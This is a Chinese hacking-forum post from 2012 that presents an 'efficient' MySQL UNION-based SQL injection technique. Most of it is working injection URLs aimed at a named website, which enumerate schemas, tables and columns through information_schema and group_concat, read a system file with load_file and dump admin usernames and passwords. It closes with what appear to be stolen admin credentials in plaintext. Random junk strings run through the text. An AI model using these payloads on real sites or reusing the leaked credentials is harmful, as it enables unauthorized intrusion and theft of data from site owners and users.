找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2237|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似. l/ d( x5 Y% Q( b0 ]! [" Z' T) m( p
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
' E- |( j6 J3 w; O" P! t. S7 \
* q4 \9 k. `4 ?- l5 V0 p2 i8 @+ [' U; w* @
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入7 ]) L8 g4 M5 |- P. x4 i
% {' t; j( Y! C
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
0 O4 v. c4 x4 s4 `/ m. E2 h) D1 p% k4 G5 ^) B4 z
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
  x, r5 |) ^  o" f6 E" ^在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等( A# j1 n1 l. }8 R! S% L; n
) g. b1 J: K* F
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17+ R# U' d$ D% U% A
* @* ]* i7 H# Q! s: |
读出所有库:
7 D' \4 p  g. Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA0 b. Z3 ]9 j3 C

% z! {2 d9 _) j# Z8 \$ G6 F  @4 {) T. V; j2 ]9 D- |7 f

$ {. g/ P6 M3 q% `读出所有表:
: f. U0 F4 [* N6 j; j1 E+ O( \  ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
! [, v" `) ^$ S" R, B4 v1 D$ g: \% M6 N
读出所有表字段:
  G) M  `8 B: Jhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
9 L& R: @8 r; P" Y5 ^5 E& j*/ (97,100,109,105,110)为admin的ascii码 依次类推% k: @8 a+ S; j7 M* O' |* K& ]) f

3 X8 f. N4 x- n1 I$ L读出所有表字段里的内容:2 o; Q' B" h5 I  b* A
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
4 w' T: K" H6 q4 K
1 ^3 O6 t( e) w- g* w, x9 J0 m4 K1 M7 q/ ?) v$ `

7 ]3 J; y" L& o1 i' C
0 b5 o1 b; U/ c) N! N
0 C6 W# l( G7 D! b! m+ L
1 c- i. d& T: l7 S6 Fhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%238 f$ c4 f9 q& z* Z5 L
# B! {1 e( i. Y5 Y! r* X4 |- g- E5 h6 t

. B3 u; s/ ^' B2 ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
* o& x; ^8 R0 E" i: a
" r) l. q3 L$ _& L( @http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
% J% u6 j3 |3 P% Y1 ~7 o2 Y2 `4 D! ]& q1 N" b9 S
* B2 Q/ s7 ~& z+ b( g9 ?
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
8 \" W# C# D0 V: |/ E& C" f3 z' q1 j, @

0 ~8 D3 v0 K* F" i        webmaster:dzb521123,simlab:simadmin20043233
/ e% I2 J* @" H2 y* A( h- g/ J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表